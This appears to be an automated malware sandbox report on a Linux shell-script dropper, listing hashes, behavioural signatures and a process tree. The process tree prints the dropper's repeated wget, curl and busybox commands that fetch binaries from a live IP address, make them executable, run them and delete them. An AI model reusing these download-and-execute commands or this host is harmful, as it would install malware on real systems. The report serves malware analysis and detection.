Analysis
-
max time kernel
70s -
max time network
74s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
-
Size
10KB
-
MD5
494b961d2cc6cd624a738d892314cce5
-
SHA1
2052b079fe79da190c6459c627a8c44003ae1f58
-
SHA256
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a
-
SHA512
801d76a32d0790a02cd3d7cd93041c371e44ee9240e240edbb3ecc9fe52c8c26b5395847509398bfa4a17c7a0064475421114120a7b5a49d167b5015a0149e50
-
SSDEEP
96:0rD7ICJJSVBxqV9VlVAVhVlVAzyqz6JbvQXgQLYE1sw/yqz8zJJSVBhk7V9VlVAQ:6eqXrifnmzheJqSXrifn0f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 957 chmod 885 chmod 963 chmod 933 chmod 873 chmod 897 chmod 969 chmod 855 chmod 810 chmod 861 chmod 891 chmod 921 chmod 945 chmod 951 chmod 804 chmod 779 chmod 867 chmod 750 chmod 741 chmod 879 chmod 909 chmod 915 chmod 939 chmod 975 chmod 735 chmod 903 chmod 927 chmod 831 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 736 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 742 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 752 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 780 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 805 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 811 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 833 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 856 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 862 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 868 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 874 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 880 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 886 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 892 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 898 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 904 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 910 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 916 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 922 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 928 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 934 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 940 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 946 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 952 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 958 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 964 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 970 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 976 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl
Processes
-
/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:734
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:740
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:746
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:775
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:802
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:809
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:815
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:852
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:860
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:866
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:872
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:878
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:884
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:890
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:896
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:902
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:908
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:914
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:920
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:926
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:932
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:935
-
-
